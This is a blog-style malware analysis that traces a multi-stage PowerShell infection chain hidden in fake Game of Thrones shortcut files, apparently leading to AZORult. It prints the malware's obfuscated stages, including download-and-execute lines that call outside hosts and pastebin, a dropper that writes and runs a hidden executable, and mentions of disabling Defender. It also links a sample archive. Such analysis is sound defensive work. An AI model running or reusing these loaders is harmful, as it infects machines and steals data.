Game of Thrones as a gateway to a botnet

Recently a friend (who is a dirty dirty pirate) shared with me a pair of files which appeared to be copies of a recent episode of Game of Thrones, but where in fact multi-gigabyte lnk files to something else.

If executed, you’ll see this error message to give you assurance that while things didn’t work, you totally didn’t accidentally install illicit software on your computer:

Though a quick view of the file properties looks odd, but nothing explicitly nefarious:

Examining the files, clearly something was amiss, so I decided to look further, eventually extracting the full shortcut:

-eXEc ByP <#
#> (('I'+'EX(Ne'+'w-Object '+'S'+'yst'+'em'+'.Net.WebC'+'l'+'ien'+'t).Down'+'l'+'oadString'+'(f0Ght tp:'+'//not'+'z.icu/'+'2f0'+'G)') -CrEplACE 'f0G',[cHar]39)| iex
Annoyingly the above includes both tabs, spaces, occasionally making clean viewing difficult.

I’m calling the above ‘stage 1’.

A brief bit of hand-decoding later, we see that it wants to download something from hXXp://notz.icu/2 and have PowerShell execute it.

Worried both about infection and revealing my home IP to whoever controls this server, I stood up an Azure VM and saw what I got, which turned out to be a HTTP 301 redirect to https://pastebin.com/raw/ufaYrvms (archived as http://archive.is/UBwhD)

Looking at what we’ll call stage 2, it was a curious bit, starting off with the following:

((“{23}{74}{6}{4}{12}{55}{53}{69}{11}{3}{85}{41}{44}{1}{64}{25}{82}{16}{72}{50}{47}{38}{91}{68}{54}{61}{96}{36}{63}{59}{9}{40}{73}{67}{0}{60}{81}{46}{34}{20}{84}{7}{76}{87}{17}{89}{70}{24}{77}{19}{27}{90}{21}{95}{71}{32}{33}{5}{10}{45}{83}{78}{37}{66}{92}{22}{88}{79}{26}{18}{49}{2}{14}{42}{62}{80}{52}{30}{43}{86}{57}{98}{75}{94}{48}{28}{97}{29}{15}{51}{8}{13}{93}{65}{31}{39}{58}{56}{35}” -f ‘YgBmADkAMwA5ADgAYQAyAGQAYgA1ADgAZAA4ADYAOQA0ADQAMwAyADgAMgA4ADIAOQBkAGMAMQBjADEANAAyA
… removed for length…
GQAMAA1ADQAZQA5AGUAMQBhADIAZQBlAGYANwA1AGQAYQBiAGUAOAA4ADIAOQBjADUAMwAxADAANAAyAGMANQ)).rEpLAce(‘1dY’,[sTrinG][ChAr]39).rEpLAce(([ChAr]66+[ChAr]88+[ChAr]115),’|’).rEpLAce(([ChAr]103+[ChAr]80+[ChAr]48),[sTrinG][ChAr]36) | . ((VarIAblE ‘*mDr*’).NAMe[3,11,2]-JOIn”)

Trying to understand the file at first was puzzling, as while I’ve plenty of PowerShell experience, I was not familiar with the {23}{74}{6}… notation, and isolated parts of it would not execute. Then I remembered, PowerShell is built with/on top of C#/.NET, and that same notation is used for formatting strings.

This turned out to be a correct guess as what followed the -f was nearly 100 individual comma separated strings… which are ultimately re-ordered into a more useful order based on the order of the {23}{74}{6}… sequence (which means use the 23^rd, then the 74^th, then the 6^th strings (and so on) for the output.

Along with this, there are a series of string replacements, we’ve a more reasonable looking executable line, which looks something like this:

& ( $Env:COmspec[4,26,25]-jOiN”) ( ( nEw-obJeCt MANaGEmENT.aUtomatiOn.PscreDENTIaL ‘ ‘, $mainPayload| coNVERTtO-SecuResTRING -KeY (131..116))).getNetwOrkCREDEnTIAl().PAssWORD) | . ((VarIAblE ‘*mDr*’).NAMe[3,11,2]-JOIn”)
$mainPayload is an injected value by me for readability. In this case it contains about 30 pages of encoded text.

How all does this get executed? In three interesting ways:

The giant string is used as the SecureString password to a PSCredential instance, and then the clear text dumped.
This in turn is executed by an obfuscated call to iex (an alias to the Invoke-Expression cmdlet)
The result of that is then piped to another obfuscated call to iex.

Re #2, the following is the cleaned up way to get the iex string:

$Env:ComSpec[4,26,25] -Join ”

The environmental variable ComSpec being 99.99% of the time being the following:

C:\WINDOWS\system32\cmd.exe

It’s pretty easy to pull out the letters you need.

Jumping to the end of the file, we have this (visually cleaned up) blurb:

((Variable ‘*mDr*’).Name[3,11,2] -Join ”)

Which does much the same thing as #2, however if we remove #2 & #3, we can get the encoded script to tell us it’s clear (inner) text.

And the remaining relevant code block with the symbolically linked argument:

( ( nEw-obJeCt MANaGEmENT.aUtomatiOn.PscreDENTIaL ‘ ‘, ($payload | coNVERTtO-SecuResTRING -KeY (131..116))).getNetwOrkCREDEnTIAl().PAssWORD)
Once again, I’ve edited the text to imply that the main encoded text is stored in $payload prior to this.

Dumping this, we get a nice big block of mostly human readable code, the bulk of which turns out to be ripped off from an open source project file (no, they didn’t include the required copyright note), the rest being more obfuscatedness:

&( ([sTrInG]$vErBOsEprEFEReNCe)[1,3]+’X’-joIn”)(NEw-ObJect Io.coMpRessION.DEFLAtesTREaM([sySTEm.io.mEmORySTReAM] [cONVErt]::fROMbASe64sTrINg(‘fZFNasNADIX3gdxBi0BacHyAQBdOaCGL/kBMsyhdjD2qPcQzMhoZx7ev7JSSBtLVMNInvcdTZu0qH1qEVRYj+qIZXoxHeGOMGMSIo7AlxuSy8MSK9MTH+Wyx6UQoTBse4GM/REGfHlyw1Mf0GWM0FW7odMY+1+vXceinXtApd9KMk8t3Z5FgSxZLeGQmXv7hCrLDiGUBcOxCbyJgKKkLgowWbMcuVNA2ZihMeUwhr3H6IYN3VS0QSCB2bUssINr8cqoso3G6hZSTHamNTHpdVCEhLftW44i/a9ILs7uSwr9R7Ly+msTBcFDL89ltVKl9Tf3dVRDJdYDJxRmShT83nRq5/wY=’ ), [io.CoMpREssIon.CoMpreSsIonmoDe]::dECOmpresS) |%{NEw-ObJect iO.sTREaMREADeR( $_ ,[teXt.ENCOdiNg]::AsCIi) } |% {$_.REAdTOend( ) })
<removed code>

Chk ieX(NEW-OBJECT SYStem.IO.COmprESsiOn.DeFLATestrEAM([IO.mEmORystrEAM][CoNverT]::fromBAse64strinG('VY1BCsIwFET3gdzhE7PQRTyA4C1cuontVINtGpMfKah3N9GCdlYD84aneeLO9QiWL7QnpeHvO8YQjuc2bcuopJBCMxLPSK3m0/Xft1Kuo/WPNLgVImZsHlJQibYhwLfVckAcnLeMliwTuwE01agl+aQxs6mKhYvMvJtujA2+n1OEvdYixUsK9AmzdtWMnp3PoNREF7jsbw==' ),[IO.cOMPRESSiOn.CompreSSIoNMoDE]::deCoMPrESs )| % { NEW-OBJECT systEm.iO.STreAmrEaDeR($_ , [sysTeM.tExt.ENCOdINg]::Ascii )}).rEaDtOend( ) lnk $QgDslk47=new-object system.net.webclient;$QgDslk47.downloadfile("https://pastebin.com/raw/QSAdtAA4","$env:temp\Dskcp.bat") BQslz4Rezkls2 -BinPath C:\Windows\System32\cmd.exe -Args "/c $env:temp\Dskcp.bat" txt New-Item $env:temp\gds.txt -ItemType file

The short version of what is going on here is the duplicating of the user token and then elevating its permissions so that the next run will be with administrator permissions, probably worthy of a later writeup or link. Suffice to say the first bit of encoded text is the actual message we saw earlier, skipping ahead we see another request to download and execute the contents of a URL, again on pastebin: https://pastebin.com/raw/QSAdtAA4 (archived as http://archive.is/VEbik).

Stage 3

I must confess… a bit of disappointment with stage three, as it took no effort to decode:

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP $qqdgs = ((New-Object System.Net.WebClient)).DownloadString(‘https://pastebin.com/raw/7gQucBhH’);IEX $qqdgs

Once again… download another pastebin document and executes it. (archived as http://archive.is/JSa6l)

Stage 4

Leaving out the actual payload body, we have something that looks like the following:

. ( $VerbosePreference.ToString()[1,3]+’x’ -Join ”) ((((“{2}{15}{21}{9}{17}{22}{4}{1}{13}{16}{23}{24}{30}{27}{18}{19}{12}{29}{10}{6}{14}{20}{31}{11}{5}{0}{8}{3}{26}{7}{28}{32}{25}”-f $payload)))
$payload is again a replacement by me to cut down on the amount of encoded text in a particular example

Manually invoking the renames & the re-ordering of the array, we have a block that looks more like:

([Runtime.InteropServices.Marshal]::PtrToStringBSTR ( [Runtime.InteropServices.Marshal]::SecureStringToBSTR ( $($payload |ConvertTo-SecureString -k 15,15,49,212,29,168,149,15,58,109,197,246,120,113,33,161,158,130,6,202,212,58,52,132) )) )| & ( $VerbosePreference.ToString()[1,3]+’X’-joIN”)

Again, another round about way to decode a string, then pipe the result to another round-about way to get ‘iex’, of course eliminating the last block, we can get the string to be executed:

Deleting Windows Defender keys or resetting them, disabling various services via various means, turning off SmartScreen & Phishing filter… that all sounds legit, doesn’t it?

Towards the end we see another interesting step, downloading of yet another string, but now we are back to the .icu TLD: hXXp://dink.icu/view/raw/7f01519a (archived at http://archive.fo/8rPdp)

Stage 5

This is perhaps the most easy to read stage after stage 3, where a giant string is set to a variable named $peString, which is then converted from base64, written to disk with a random name, and executed. This is also interesting as it too is not obfuscated:

$peString = ‘<removed for length and it’s guaranteed to get flagged>’

$osCheckMajor = [System.Environment]::OSVersion.Version | Select -Expand Major;$osCheckMinor = [System.Environment]::OSVersion.Version | Select -Expand Minor;$osVersion = “$osCheckMajor” + ‘.’ + “$osCheckMinor”;$poshVersion = $PSVersionTable.PSVersion.Major;if($poshVersion -eq 2){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + ‘.exe’;$savePath = “$env:APPDATA” + ‘\’ + “$peName”;;;;;[IO.File]::WriteAllBytes($savePath, [Convert]::FromBase64String($peString))}elseif($poshVersion -ge 3){$randomInt = Get-Random -Minimum 5 -Maximum 10;$randomStr = -join ((65..90) + (97..122) | Get-Random -Count $randomInt | % {[char]$_});$peName = $randomStr + ‘.exe’;$savePath = “$env:APPDATA” + ‘\’ + “$peName”;;;;;[IO.File]::WriteAllBytes($savePath, [Convert]::FromBase64String($peString))};Start-Process $savePath;attrib +h +s $savePath;

Stage 6

I’ve not dug too much into the resulting binary, I know where it calls home for it’s C&C & I’ve reason to believe it’s in the AZORult family, but more on that another day.

Links

Links to Virus Total uploads of each stage (where thankfully most are known, though not widely, and the registry key switches in stage 4 make later detection much more difficult):

Files: /wp-content/uploads/2019/05/psmalware.zip (pw: infected)

Stage 3

Stage 4

Stage 5

Stage 6

Links

Leave a Reply Cancel reply